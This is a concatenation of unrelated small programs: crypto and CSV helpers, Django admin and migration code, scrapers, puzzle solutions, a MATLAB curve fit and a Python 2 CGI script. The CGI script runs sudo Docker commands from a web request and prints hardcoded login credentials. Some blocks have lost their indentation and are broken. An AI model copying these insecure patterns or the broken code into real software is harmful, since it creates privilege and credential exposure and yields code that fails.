handle_annotations(item_list)
print("Handling Images")
handle_images(item_list)
|
#!/usr/bin/env python
import base64
import sys
import os
import random
import struct
from Crypto.Cipher import AES
from Crypto.Hash import SHA256
from Crypto import Random
from cexceptions import *
# AES block size in bytes; pad()/unpad() align plaintext to this length.
chunk_length = 16


def pad(s):
    """Apply PKCS#7-style padding: append N copies of chr(N) so that the
    result length is a multiple of chunk_length (a full extra block is
    appended when the input is already aligned).
    """
    n = chunk_length - len(s) % chunk_length
    return s + n * chr(n)


def unpad(s):
    """Strip the PKCS#7-style padding added by pad().

    The last character encodes how many padding characters to remove.
    """
    return s[0:-ord(s[-1])]
class DeltaCrypt(object):
    """AES-CBC helper: encrypts/decrypts strings, base64-encoding IV +
    ciphertext and optionally returning a SHA-256 digest of the plaintext."""
    key = ''

    def __init__(self, key):
        """Store the key; AES accepts only 16/24/32-byte keys.

        :raises CryptoKeyLengthException: when the encoded key has any
            other length.
        """
        self.key = key.encode()
        key_length = len(self.key)
        if key_length not in [16, 24, 32]:
            raise CryptoKeyLengthException('AES key_length must be in [16, 24, 32], please verify your key: %s (%s)' % (key, key_length))

    def _spawn_cryptor(self, iv = ''):
        """Return an AES-CBC cipher for *iv*; with no IV, generate a fresh
        random one and return [iv, cipher]."""
        if iv:
            return AES.new(self.key, AES.MODE_CBC, iv)
        else:
            iv = Random.new().read(AES.block_size)
            return [iv, AES.new(self.key, AES.MODE_CBC, iv)]

    def encrypt(self, raw_string, return_checksum=True):
        """Encrypt *raw_string* and return base64(iv + ciphertext),
        optionally as [sha256_hexdigest, encrypted].

        NOTE(review): pad() uses chr() and SHA256.new() is fed the raw
        value directly — this looks written for Python 2 str; on Python 3
        SHA256.new() requires bytes. Confirm the target interpreter.
        """
        padded = pad(raw_string)
        iv, cryptor = self._spawn_cryptor()
        # The IV is prepended so decrypt() can recover it from the payload.
        encrypted = base64.b64encode(iv + cryptor.encrypt(padded))
        if return_checksum:
            return [SHA256.new(raw_string).hexdigest(), encrypted]
        else:
            return encrypted

    def decrypt(self, encrypted_string, return_checksum=True):
        """Reverse encrypt(): base64-decode, split off the 16-byte IV,
        decrypt and unpad; optionally return [sha256_hexdigest, plaintext]."""
        encrypted_string = base64.b64decode(encrypted_string)
        iv = encrypted_string[:16]
        decrypted = unpad(self._spawn_cryptor(iv).decrypt(encrypted_string[16:]))
        if return_checksum:
            return [SHA256.new(decrypted).hexdigest(), decrypted]
        else:
            return decrypted
|
from chardet.universaldetector import UniversalDetector
from collections import defaultdict
from .base_object import BaseObject
from itertools import tee
from glob import glob
import hashlib
import codecs
import types
import time
import json
import csv
import sys
import os
class UTF8Recoder:
    """
    Python2.7: Iterator that reads an encoded stream and reencodes the input to UTF-8
    """
    def __init__(self, f, encoding):
        # Wrap the raw file in a decoding reader for the given charset.
        self.reader = codecs.getreader(encoding)(f)

    def __iter__(self):
        return self

    def next(self):
        # Python 2 iterator protocol: decode one line, re-encode as UTF-8.
        return self.reader.next().encode("utf-8")
class UnicodeDictReader:
    """
    Python2.7: A CSV reader which will iterate over lines in the CSV file "f",
    which is encoded in the given encoding.
    """
    def __init__(self, f, encoding="utf-8", **kwargs):
        f = UTF8Recoder(f, encoding)
        self.reader = csv.reader(f, **kwargs)
        # First row is consumed as the header used to key each returned dict.
        self.header = self.reader.next()

    def next(self):
        # Python 2 iterator protocol: return the next row as {header: value}.
        row = self.reader.next()
        vals = [unicode(s, "utf-8") for s in row]
        return dict((self.header[x], vals[x]) for x in range(len(self.header)))

    def __iter__(self):
        return self
class CSVObject(object):
    """CSV Object

    Helper for CSV files: charset detection, Python 2/3 compatible reading,
    header and row inspection, numeric type inference, and column addition.
    """
    # Major interpreter version; used to select py2/py3 code paths below.
    python_version = sys.version_info.major

    def __init__(self, delimiter=',', lineterminator='\n', csv_charset=None):
        """Remember the CSV dialect (delimiter, line terminator, charset)."""
        self.delimiter = delimiter
        self.lineterminator = lineterminator
        self.csv_charset = csv_charset

    @classmethod
    def detect_csv_charset(cls, file_name, **csv_object):
        """Function: detect_csv_charset

        :param file_name: the file name
        :return: a cls instance whose csv_charset is the detected encoding
        """
        detector = UniversalDetector()
        detector.reset()
        with open(file_name, 'rb') as f:
            for row in f:
                detector.feed(row)
                if detector.done:
                    break
        detector.close()
        encoding = detector.result.get('encoding')
        csv_object['csv_charset'] = encoding
        return cls(**csv_object)

    def compatible_dict_reader(self, f, encoding, **kwargs):
        """Function: compatible_dict_reader

        :param f: the file object from compatible_open
        :param encoding: the encoding charset
        :return return csvReader
        """
        if self.python_version == 2:
            return UnicodeDictReader(f, encoding=encoding, **kwargs)
        else:
            return csv.DictReader(f, **kwargs)

    def compatible_open(self, file_name, encoding, mode='r'):
        """Function: compatible_open

        :param file_name: the file name
        :param mode: the open mode
        :param encoding: the encoding charset
        :return return file object
        """
        # Python 2's open() has no encoding parameter.
        if self.python_version == 2:
            return open(file_name, mode=mode)
        else:
            return open(file_name, mode=mode, encoding=encoding)

    def get_csv_header(self, file_name):
        """Function: get_csv_header.

        :param file_name: the file name
        :return return csv header as list (empty when no header detected;
            None for an empty file)
        """
        self.valid_file_exist(file_name)
        with self.compatible_open(file_name, encoding=self.csv_charset) as f:
            sniffer = csv.Sniffer()
            try:
                has_header = sniffer.has_header(f.read(40960))  # python3.x
            except (UnicodeEncodeError, UnicodeDecodeError):
                f.seek(0)
                has_header = sniffer.has_header(f.read(40960).encode(self.csv_charset))  # python2.x
            except csv.Error:
                has_header = False
            f.seek(0)
            csv_reader = self.compatible_dict_reader(f, encoding=self.csv_charset, delimiter=self.delimiter,
                                                     lineterminator=self.lineterminator)
            for row in csv_reader:
                headers = list(row.keys())
                # Fallback heuristic: a row with no purely-numeric field is a header.
                is_header = not any(field.isdigit() for field in headers)
                headers = headers if has_header or is_header else []
                return headers

    @staticmethod
    def search_files_in_dir(directory, match_suffix='.csv', filter_pattern='_influx.csv'):
        """Function: search_files_in_dir

        :param directory: the directory
        :param match_suffix: match the file suffix, use comma to separate, only string, not support regex
        :param filter_pattern: filter the files, only string, not support regex
        """
        base_object = BaseObject()
        match_suffix = base_object.str_to_list(match_suffix, lower=True)
        filter_pattern = base_object.str_to_list(filter_pattern, lower=True)
        # Is file
        is_file = os.path.isfile(directory)
        if is_file:
            yield directory
        # Search directory
        for x in os.walk(directory):
            for y in glob(os.path.join(x[0], '*.*')):
                # Continue if directory
                try:
                    check_directory = os.path.isdir(y)
                except UnicodeEncodeError as e:
                    y = y.encode('utf-8', 'ignore')
                    print('Warning: Unicode Encode Error found when checking isdir {0}: {1}'.format(y, e))
                    check_directory = os.path.isdir(y)
                if check_directory is True:
                    continue
                # Filter Out
                match_suffix_status = any(the_filter in y.lower() for the_filter in match_suffix)
                filter_pattern_status = any(the_filter in y.lower() for the_filter in filter_pattern)
                if match_suffix_status is True and filter_pattern_status is False:
                    yield y

    @staticmethod
    def valid_file_exist(file_name):
        """Function: valid_file_exist

        Exits the process when the file does not exist.

        :param file_name: the file name
        """
        file_exists = os.path.exists(file_name)
        if file_exists is False:
            error_message = 'Error: The file does not exist: {0}'.format(file_name)
            sys.exit(error_message)

    def get_file_md5(self, file_name):
        """Function: get_file_md5

        :param file_name: the file name
        :return return the file md5
        """
        self.valid_file_exist(file_name)
        hash_md5 = hashlib.md5()
        # Hash in 40 KB chunks so large files do not load fully into memory.
        with open(file_name, "rb") as f:
            for chunk in iter(lambda: f.read(40960), b""):
                hash_md5.update(chunk)
        return hash_md5.hexdigest()

    def get_file_modify_time(self, file_name, enable_ms=False):
        """Function: get_file_modify_time

        :param file_name: the file name
        :param enable_ms: enable milliseconds (default False)
        :return return the human readable time (GMT)
        """
        self.valid_file_exist(file_name)
        modified = os.path.getmtime(file_name)
        modified_s, modified_ms = divmod(modified * 1000, 1000)
        if enable_ms is False:
            modified_pretty = time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime(modified_s))
        else:
            modified_pretty = '%s.%03d' % (time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime(modified_s)), modified_ms)
        return modified_pretty

    def get_csv_lines_count(self, file_name):
        """Function: get_csv_lines_count.

        :param file_name: the file name
        :return return csv line count. No count header into count
        """
        has_header = self.get_csv_header(file_name)
        with self.compatible_open(file_name, encoding=self.csv_charset) as f:
            # DictReader consumes the first row as the header, so start at 1
            # when the file actually has no header row.
            count = 0 if has_header else 1
            csv_reader = self.compatible_dict_reader(f, encoding=self.csv_charset, delimiter=self.delimiter,
                                                     lineterminator=self.lineterminator)
            for row in csv_reader:
                count += 1
            return count

    def convert_csv_data_to_int_float(self, file_name=None, csv_reader=None, ignore_filed=None):
        """Function: convert_csv_data_to_int_float

        :param file_name: the file name (default None)
        :param csv_reader: the csv dict reader (default None)
            The csv_reader could come from 2 ways:
            1. use csv.DictReader to get the csv_reader object
            2. use dict to make up the csv_reader, the dict format is as following
               [
                   {'csv_header_1': 'value', 'csv_header_2': 'value', 'csv_header_3': 'value', ...},
                   {'csv_header_1': 'value', 'csv_header_2': 'value', 'csv_header_3': 'value', ...},
                   {'csv_header_1': 'value', 'csv_header_2': 'value', 'csv_header_3': 'value', ...},
                   ...
               ]
        :param ignore_filed: ignore the certain column, case sensitive
        :yields (row, int_type, float_type) with values converted to
            int/float only when EVERY value in that column converts cleanly
        """
        # init
        int_type = defaultdict(list)
        float_type = defaultdict(list)
        keys = list()
        csv_reader = list() if csv_reader is None else csv_reader
        csv_reader_bk = csv_reader
        has_header = True
        # Verify the csv_reader
        csv_reader_type = type(csv_reader)
        is_generator_type = isinstance(csv_reader, types.GeneratorType)
        if csv_reader_type != list and csv_reader_type != csv.DictReader and not is_generator_type:
            error_message = 'Error: The csv_reader type is not expected: {0}, ' \
                            'should list type or csv.DictReader'.format(csv_reader_type)
            sys.exit(error_message)
        if is_generator_type:
            # tee() so the data can be scanned twice: once for type
            # inference, once for the actual conversion pass.
            csv_reader, csv_reader_bk = tee(csv_reader)
        # Get csv_reader from csv file
        f = None
        if file_name:
            has_header = self.get_csv_header(file_name)
            with self.compatible_open(file_name, encoding=self.csv_charset) as f:
                csv_reader = self.compatible_dict_reader(f, encoding=self.csv_charset, delimiter=self.delimiter,
                                                         lineterminator=self.lineterminator)
                csv_reader, csv_reader_bk = tee(csv_reader)
        # Process
        # First pass: record per-column int/float convertibility.
        for row in csv_reader:
            keys = row.keys()
            for key in keys:
                value = row[key]
                len_value = len(value)
                # Continue If Value Empty
                if len_value == 0:
                    int_type[key].append(False)
                    float_type[key].append(False)
                    continue
                # Continue if ignore_filed is provided
                if ignore_filed is not None and ignore_filed == key:
                    int_type[key].append(False)
                    float_type[key].append(False)
                    continue
                # Valid Int Type
                try:
                    if float(value).is_integer():
                        int_type[key].append(True)
                    else:
                        int_type[key].append(False)
                except ValueError:
                    int_type[key].append(False)
                # Valid Float Type
                try:
                    float(value)
                    float_type[key].append(True)
                except ValueError:
                    float_type[key].append(False)
        # Valid the key if no header
        # (the "header" row is really data when the file has no header).
        if keys and not has_header:
            for key in keys:
                len_key = len(key)
                # Continue If Key Empty
                if len_key == 0:
                    continue
                # Valid Int Type
                try:
                    if float(key).is_integer():
                        int_type[key].append(True)
                    else:
                        int_type[key].append(False)
                except ValueError:
                    int_type[key].append(False)
                # Valid Float Type
                try:
                    float(key)
                    float_type[key].append(True)
                except ValueError:
                    float_type[key].append(False)
        # Finalize Type
        # A column is int/float only if every one of its values converted.
        int_type = {k: all(int_type[k]) for k in int_type}
        float_type = {k: all(float_type[k]) for k in float_type}
        # Yield Data
        i = 1
        for row in csv_reader_bk:
            keys = row.keys()
            for key in keys:
                value = row[key]
                int_status = int_type[key]
                len_value = len(value)
                if len_value == 0:
                    continue
                if int_status is True:
                    row[key] = int(float(value)) if int_type[key] is True else value
                else:
                    row[key] = float(value) if float_type[key] is True else value
            yield row, int_type, float_type
            # Headerless files: also emit the consumed "header" row as data.
            if not has_header and i == 1:
                for key in keys:
                    int_status = int_type[key]
                    len_key = len(key)
                    if len_key == 0:
                        continue
                    if int_status is True:
                        row[key] = int(float(key)) if int_type[key] is True else key
                    else:
                        row[key] = float(key) if float_type[key] is True else key
                yield row, int_type, float_type
            i += 1
        # Close file
        if file_name:
            # NOTE(review): f was opened via `with`, so it is already closed
            # here — and iterating csv_reader_bk above after the `with` block
            # would read from a closed file on Python 3; confirm behaviour.
            f.close()

    def add_columns_to_csv(self,
                           file_name,
                           target,
                           data,
                           save_csv_file=True):
        """Function: add_columns_to_csv

        :param file_name: the file name
        :param target: the target file to save result
        :param data: the new columns data, list type, the item is dict.
            for example: [{"new_header_1": ["new_value_1", "new_value_2", "new_value_3"]},
                          {"new_header_2": ["new_value_1", "new_value_2", "new_value_3"]}
                         ]
        :param save_csv_file: save csv file to local (default True)
        :return return the new csv data by dict
        """
        has_header = self.get_csv_header(file_name)
        # Process data
        data_type = type(data)
        error_message = 'Error: The data should be list type, the item should be dict. Or the json type as following ' \
                        'for example: [{"new_header_1": ["new_value_1", "new_value_2", "new_value_3"]}, ' \
                        '{"new_header_2": ["new_value_1", "new_value_2", "new_value_3"]}]'
        # The try/except NameError pairs keep this working on Python 3,
        # where the `unicode` builtin does not exist.
        try:
            check_data_type = data_type is not list and data_type is not str and data_type is not unicode
        except NameError:
            check_data_type = data_type is not list and data_type is not str
        if check_data_type:
            sys.exit(error_message)
        try:
            check_data_type = data_type is str or data_type is unicode
        except NameError:
            check_data_type = data_type is str
        if check_data_type:
            # String input is treated as JSON and parsed into the list form.
            try:
                data = json.loads(data)
            except ValueError:
                sys.exit(error_message)
        # Add columns
        target_writer = None
        target_file = None
        if save_csv_file:
            target_file = self.compatible_open(target, mode='w+', encoding=self.csv_charset)
            target_writer = csv.writer(target_file, delimiter=self.delimiter, lineterminator=self.lineterminator)
        with self.compatible_open(file_name, encoding=self.csv_charset) as f:
            source_reader = self.compatible_dict_reader(f, encoding=self.csv_charset, delimiter=self.delimiter,
                                                        lineterminator=self.lineterminator)
            new_headers = [list(x.keys())[0] for x in data]
            row_id = 0
            for row in source_reader:
                values = list(row.values())
                if row_id == 0:
                    headers = list(row.keys())
                    if not has_header:
                        continue
                    headers += new_headers
                    if save_csv_file:
                        target_writer.writerow(headers)
                new_values = list()
                for x in data:
                    try:
                        value = list(x.values())[0][row_id]
                    except IndexError:
                        print('Warning: The provided column length is less than with the source csv length. '
                              'Use "null" to fill the empty data')
                        value = 'null'
                    new_values.append(value)
                values += new_values
                row_id += 1
                if save_csv_file:
                    try:
                        target_writer.writerow(values)
                    except (UnicodeEncodeError, UnicodeDecodeError):
                        # Python 2 fallback: write UTF-8 encoded bytes.
                        values = [v.encode('utf-8') for v in values]
                        target_writer.writerow(values)
                yield dict(zip(headers, values))
        if save_csv_file:
            target_file.close()
|
from django.contrib import admin
from . import models
from django.contrib.auth.models import User
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
# Register your models here.
class LivreAdmin(admin.ModelAdmin):
    """Admin configuration for Livre (book) objects: columns displayed,
    filtering, ordering, search and edit-form fields.
    """
    list_display = ('titre','auteur','slug_title','couverture','note')  # columns shown in the book list,
    # in this display order
    list_filter = ('titre','auteur','note')  # fields available for filtering the book list
    ordering = ('titre',)  # fields used to order the books
    search_fields = ('titre', 'auteur', 'note', 'isbn')  # fields used to search for books
    fields = ('titre','slug_title','auteur','couverture','resume',
              'edition','note','codeBarre','isbn')
    prepopulated_fields = {'slug_title':('titre',),}
    # Important: fields listed in prepopulated_fields must also appear in `fields`.


admin.site.register(models.Livre, LivreAdmin)
# Makes Livre objects manageable from the admin site,
# binding the Livre model to its admin representation, LivreAdmin.
class UserProfileInline(admin.StackedInline):
    """Inline admin so UserProfile objects are edited within the User page."""
    model = models.UserProfile  # required when using inlines


admin.site.unregister(User)  # needed because User already has a default ModelAdmin registered
@admin.register(User)
class UserAdmin(BaseUserAdmin):
    """Admin for User, extended with fields from the related UserProfile."""
    model = User
    # add_fieldsets is used instead of a plain `fields` because User already
    # ships with its own admin class whose creation form we extend.
    add_fieldsets = BaseUserAdmin.add_fieldsets + (
        (None,
         {'fields':('email','first_name','last_name')}),
    )
    ordering = ('username',)
    inlines = [UserProfileInline,]
    # list_display may reference methods of this class; mind ManyToManyField
    # handling — see the ModelAdmin.list_display documentation.
    list_display = ('username','slug_username','email','first_name','last_name','imageProfil',
                    'is_active','is_staff','is_superuser')
    search_fields = ('username', 'last_name', 'first_name','email')

    def slug_username(self,obj):
        """Return the slug_username field of the related UserProfile."""
        # A OneToOneField is reachable (in both directions) as
        # obj.<lowercasedclassname>.<field>.
        return obj.userprofile.slug_username

    def imageProfil(self,obj):
        """Return the profile image of the related UserProfile."""
        return obj.userprofile.imageProfil
|
from deck import Deck
from hand import Hand
class GameController():
    """Coordinates a card game: owns the draw/discard decks and one hand per player."""

    def __init__(self, player_count):
        """Build a shuffled draw deck, an empty discard deck, and prompt on
        stdin for each player's name to create their hand."""
        draw_deck = Deck()
        draw_deck.fill_deck()
        draw_deck.shuffle()
        self.game_deck = draw_deck
        self.discard_deck = Deck()
        self.player_hands = [
            Hand(input("Enter name of player: ")) for _ in range(player_count)
        ]

    def setup_game(self):
        """Deal seven rounds, one card to each hand per round."""
        for _round in range(7):
            for hand in self.player_hands:
                hand.draw_card(self.game_deck)

    def display_hands(self):
        """Show every player's hand."""
        for hand in self.player_hands:
            hand.display_hand()
|
#!/usr/bin/python3
import sys
from datetime import datetime
import timeit
# Global variables
pwlist = []  # parsed input: one list of words per passphrase line
result01 = 0  # answer for part 1 (set by part01)
result02 = 0  # answer for part 2 (set by part02)
# Functions
def part01():
global pwlist
global result01
sum = 0
for pwline in pwlist:
unique_pw = set()
for pw in pwline:
unique_pw.add(pw)
if (len(pwline) == len(unique_pw)):
sum += 1
result01 = sum
def part02():
global pwlist
global result02
sum = 0
for pwline in pwlist:
unique_pw = set()
for pw in pwline:
pw = ''.join(sorted(pw))
unique_pw.add(pw)
if (len(pwline) == len(unique_pw)):
sum += 1
result02 = sum
def bench(part=0, filename=''):
    """Benchmark entry point used by an external driver.

    Re-reads *filename* (one passphrase per line, space-separated words) into
    the module-global ``pwlist``, times the requested *part* (1 or 2) once,
    and prints: day part answer microseconds.

    NOTE(review): the timeit setup does ``from day04 import ...``, so the
    timed call and the ``result01``/``result02`` read below only share globals
    when this file is importable as module ``day04`` -- verify with the driver.
    """
    global pwlist
    pwlist = []
    if filename != '':
        with open(filename, 'r') as f:
            for line in f:
                pwlist.append(line.rstrip().split(' '))
    if part == 1:
        duration01 = timeit.timeit("part01()", setup="from day04 import part01", number=1)
        print(4, 1, result01, int(duration01 * 10 ** 6))
    elif part == 2:
        duration02 = timeit.timeit("part02()", setup="from day04 import part02", number=1)
        print(4, 2, result02, int(duration02 * 10 ** 6))
# Main
if __name__ == '__main__':
    # Read the input file named on the command line: one passphrase per line,
    # split into words.
    with open(sys.argv[1], 'r') as f:
        for line in f:
            pwlist.append(line.rstrip().split(' '))
    # Time each part once; output format: day part answer microseconds.
    duration01 = timeit.timeit("part01()", setup="from __main__ import part01", number=1)
    print(4, 1, result01, int(duration01 * 10 ** 6))
    duration02 = timeit.timeit("part02()", setup="from __main__ import part02", number=1)
    print(4, 2, result02, int(duration02 * 10 ** 6))
|
import os
import scipy.io as sio
import DictionaryLearning.ODL as ODL
import set_params
import numpy as np
def dictionaryLearning(X):
    """Run Online Dictionary Learning on feature matrix ``X``.

    Returns the learned dictionary and the sparse coefficients
    (``dic``, ``cof``) from the project's ODL implementation.
    """
    k = set_params.k  # dictionary size taken from the shared config module
    clf = ODL.ODL(k, lambd=0.01)
    dic, cof = clf.fit(X, verbose=True, iterations=10)
    return dic, cof
def main(featurePath):
    """Load every ``.mat`` feature file under *featurePath*, learn a
    dictionary and save the result.

    The learned dictionary/coefficients are written next to *featurePath*
    as ``Train_dic_cof.mat`` with keys ``dic`` and ``cof``.
    """
    if not os.path.exists(featurePath):
        print("featurePath not exist!")
        # Bug fix: previously fell through and crashed in os.listdir().
        return
    # Bug fix: the original filtered with list.remove() while iterating the
    # same list, which skips elements; build the filtered list instead.
    features = [name for name in os.listdir(featurePath) if name.endswith('.mat')]
    matrixList = []
    for C3DFeature in features:
        featureMatrix = sio.loadmat(os.path.join(featurePath, C3DFeature)).get('reduceDimFeature')
        matrixList.append(featureMatrix)
    X = np.concatenate(tuple(matrixList), axis=0)
    print("Online Dictionary Learning (ODL)")
    dic, cof = dictionaryLearning(X.T)
    sio.savemat(os.path.join(os.path.dirname(featurePath), "Train_dic_cof.mat"), {'dic': dic, 'cof': cof})
if __name__ == '__main__':
    # NOTE(review): despite the variable name, this path points at the *Test*
    # split of UCSDped1 -- confirm which split should be used for training.
    trainFeaturePath = "C:/Users/admin/Documents/Surveillance/UCSD_Anomaly_Dataset.v1p2/UCSDped1/Test_reduce_dim_feature"
    main(trainFeaturePath)
|
# Converts Rock Band / Guitar Hero .mogg multitracks into per-channel WAVs.
srcDir = "/srv/unmix-server/1_sources/RockBand-GuitarHero/"
destDir = "/srv/unmix-server/2_prepared/RockBand-GuitarHero/"
# Handle multitrackdownloads-alphanumeric
# This folder contains mogg files (sometimes directly in song folder, sometimes in subfolder).
# Take those and convert them with ffmpeg.
import subprocess
import glob, os
from shutil import copy
os.chdir(srcDir + "multitrackdownloads-alphanumeric")
for file in glob.glob("**/*.mogg"):
    print(file)
    copy(file, destDir)
    file = destDir + os.path.basename(file)
    # The mogg files can't be processed with ffmpeg without this modification
    # Modify file: find occurrence of "OggS" in binary mogg file and remove everything before it
    # (b'\x4F\x67\x67\x53' is the ASCII "OggS" page magic of the embedded Ogg stream)
    with open(file, 'rb') as f:
        s = f.read()
    occurrenceOgg = s.find(b'\x4F\x67\x67\x53')
    s = s[occurrenceOgg:]
    with open(file + "_fixed.mogg", "wb") as f2:
        f2.write(s)
    os.remove(file)
    file = file + "_fixed.mogg"
    extractFolder = destDir + os.path.basename(file) + "_extract/"
    os.mkdir(extractFolder)
    # Ask ffprobe how many audio channels the fixed Ogg carries.
    # NOTE(review): shell commands are built by string concatenation from file
    # names -- fine for this trusted local tree, unsafe for arbitrary paths.
    numChannels = subprocess.check_output("ffprobe -show_entries stream=channels -of compact=p=0:nk=1 -v 0 \"" + file + "\"", shell=True)
    print(str(numChannels))
    # Extract each channel into its own WAV file: 0.wav, 1.wav, ...
    for i in range(int(numChannels)):
        subprocess.check_call("ffmpeg -i \"" + file + "\" -map_channel 0.0." + str(i) + " \"" + extractFolder + str(i) + ".wav\"", shell=True)
|
# Generated by Django 2.2.4 on 2019-09-29 11:00
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated: relabels the ``lot`` relations as "House No."
    (display-only change, no schema impact)."""
    dependencies = [
        ('residents', '0003_resident_default_lot'),
    ]
    operations = [
        migrations.AlterField(
            model_name='request',
            name='lot',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='residents.Lot', verbose_name='House No.'),
        ),
        migrations.AlterField(
            model_name='resident',
            name='lot',
            field=models.ManyToManyField(through='residents.ResidentLotThroughModel', to='residents.Lot', verbose_name='House No.'),
        ),
        migrations.AlterField(
            model_name='residentlotthroughmodel',
            name='lot',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='residents.Lot', verbose_name='House No.'),
        ),
    ]
|
import logging
import logging.config
from pathlib import Path
# Configure logging for the whole package from config/log.ini (one level up)
# as a side effect of importing this module.
logging.config.fileConfig(str(Path(__file__).parents[1] / 'config' / 'log.ini'))
def get_logger(logger_name):
    """Return the logger registered under *logger_name*.

    Handlers and levels come from the module-wide fileConfig() call above.
    """
    named_logger = logging.getLogger(logger_name)
    return named_logger
|
class Solution:
    # @param A : integer
    # @param B : integer
    # @return an integer
    def gcd(self, A, B):
        """Greatest common divisor via the iterative Euclidean algorithm."""
        while A != 0:
            A, B = B % A, A
        return B
|
#!/usr/bin/python2
import cgitb,cgi,commands,random
print "Contant-type:text/html"
print ""
cgitb.enable()
x=cgi.FieldStorage()
n=x.getvalue("num")
u=x.getvalue('uname')
p=x.getvalue('pas')
port=random.randint(6000,7000)
commands.getoutput("sudo systemctl restart docker")
print "<html>"
print "access your container using links:"
print "<br>"
print "</html>"
for i in range(int(n)) :
ip=commands.getstatusoutput("sudo docker run -itd -p "+ str(port)+":4200 rahul14 ")
#commands.getoutput("sudo docker attach "+u+" ")
commands.getoutput("sudo docker exec -t "+ip[1]+" service shellinaboxd restart")
#commands.getoutput("sudo service shellinaboxd restart")
#ip=commands.getoutput("sudo hostname -i")
print "<html>"
print " <a href='http://192.168.43.103:"+ str(port)+"' target='_blank'> Container " + str(i) +" </a>"
print "access containers using login - ritesh ; password - redhat "
print "</html>"
|
% Aligning moment compliance test.
% NOTE(review): the original file mixed a Python header (import numpy) with
% MATLAB syntax (data(:,1), optimset, lsqcurvefit) and would run in neither
% language; rewritten here as pure MATLAB.  enf_fcn.m must be on the path.
data = [0      0;
        0.5401 13.7340;
        1.0801 30.2148;
        1.2463 41.2020;
        1.5372 61.8030;
        1.6203 75.5370;
        1.9944 89.2710;
        2.0774 103.0050];
defl = data(:,1);          % measured deflection (deg/100Nm per wheel)
Nm   = data(:,2);          % applied aligning moment (Nm)
nf   = linspace(-100,100,21);
%% Fit the data to a parametric curve
options = optimset('MaxFunEvals',100000,'MaxIter',100000,'Display','final');
AMC = [0.5 100];           % initial guess for the two model parameters
AMC = lsqcurvefit('enf_fcn',AMC, Nm, defl,[],[],options)
enf1 = enf_fcn(AMC, nf);
%% Plot of fit and of original data
figure
hold on
plot(Nm,defl)
plot(nf,enf1,'ro-')
legend('Experimental values','Parametrised representation','Location', 'NorthWest')
text(60,.5,{['Enfb= ' num2str(AMC(1))],['Enfc= ' num2str(AMC(2))]})
xlabel('Aligning Moment (Nm)')
ylabel('Aligning Moment Steer Compliance (deg/100Nm per wheel)')
grid
title('Two Parameter Nonlinear Compliance Steer Model')
import setuptools
import versioneer
LONG_DESCRIPTION = """
**aospy**: automated gridded climate data analysis and management
A framework that enables automated calculations using gridded climate data.
Following some basic description of where your data lives and defining any
functions of variables stored in that data you want to compute, aospy enables
you to fire off an arbitrary number of calculations using that data.
Important links
---------------
- HTML documentation: http://aospy.readthedocs.io/en/latest
- Mailing list: https://groups.google.com/d/forum/aospy
- Issue tracker: https://github.com/spencerahill/aospy/issues
- Source code: https://github.com/spencerahill/aospy
"""
# Version string and build commands are derived from git tags by versioneer.
setuptools.setup(
    name="aospy",
    version=versioneer.get_version(),
    cmdclass=versioneer.get_cmdclass(),
    packages=setuptools.find_packages(),
    author="aospy Developers",
    author_email="aospy@googlegroups.com",
    description="Automated gridded climate data analysis and management",
    long_description=LONG_DESCRIPTION,
    install_requires=['numpy >= 1.7',
                      'scipy >= 0.16',
                      'pandas >= 0.15.0',
                      'netCDF4 >= 1.2',
                      'toolz >= 0.7.2',
                      'dask >= 0.14',
                      'distributed >= 1.17.1',
                      'xarray >= 0.14.1',
                      'cloudpickle >= 0.2.1',
                      'cftime >= 1.0.0'],
    tests_require=['pytest >= 3.3'],
    package_data={'aospy': ['test/data/netcdf/*.nc']},
    scripts=['aospy/examples/aospy_main.py',
             'aospy/examples/example_obj_lib.py'],
    license="Apache",
    keywords="climate science netcdf xarray",
    url="https://github.com/spencerahill/aospy",
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Science/Research',
        'License :: OSI Approved :: Apache Software License',
        'Natural Language :: English',
        'Operating System :: OS Independent',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Topic :: Scientific/Engineering :: Atmospheric Science'
    ]
)
|
def _normalize_mail(address):
    """Lowercase *address* and strip dots from its local part (Gmail-style)."""
    address = address.lower()
    local, domain = address.split('@', 1)
    return local.replace('.', '') + '@' + domain


mail = input("Please, enter your mail address E.g (abc@def.com)")
referenceMail = "ceng113@iyte.edu.tr"
if '@' in mail:
    mail = _normalize_mail(mail)
    print(mail)
    if mail == referenceMail:
        print("Equal")
    else:
        print("Not equal")
else:
    # Bug fix: the original ended with a second, unconditional
    # print("Not equal"); it is treated here as the intended
    # "input has no @" branch so only one verdict is ever printed.
    print("Not equal")
|
# Dependencies
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from bs4 import BeautifulSoup
# Use selenium to grab html on site (after waiting for site to fully load)
def get_html(url, wait):
    """Fetch *url* with headless Firefox and return the rendered page source.

    wait: implicit-wait budget in seconds.  NOTE(review): implicitly_wait
    applies to element lookups, not to page_source -- confirm the page is
    fully rendered for the target site.
    """
    print("\nStarting headless Firefox driver!")
    print(f"Navigating to {url}")
    print(f"Waiting {wait} seconds...\n")
    options = Options()
    options.headless = True
    driver = webdriver.Firefox(options=options)
    try:
        driver.implicitly_wait(wait)
        driver.get(url)
        html = driver.page_source
    finally:
        # Bug fix: close() only closes the window and leaks the geckodriver
        # process (especially on exceptions); quit() ends the whole session.
        driver.quit()
    return html
def get_search_results():
    """Parse html_dump.html, extract the video-modal anchors and persist them.

    Writes the stringified list of matching <a class="videomodal"> tags to
    search_results.html and returns that same string.
    """
    with open("html_dump.html", "r", encoding="utf-8") as dump:
        page = dump.read()
    anchors = BeautifulSoup(page, "lxml").find_all("a", class_="videomodal")
    results_markup = str(anchors)
    with open("search_results.html", "w+", encoding="utf-8") as out:
        out.write(results_markup)
    return results_markup
url = 'https://factba.se/search#barron%2Bpositive'
html = get_html(url, wait=5)
# Persist the rendered page so get_search_results() can parse it offline.
with open('html_dump.html', 'w+', encoding='utf-8') as f:
    f.write(html)
# The remaining lines are scratch BeautifulSoup usage examples kept for reference.
# soup = BeautifulSoup(html_string, "html.parser")
# print(soup.prettify())
# print(soup.head.prettify())
# print(soup.head.title.text.strip())
# print(soup.title.text)
# print(soup.p.text)
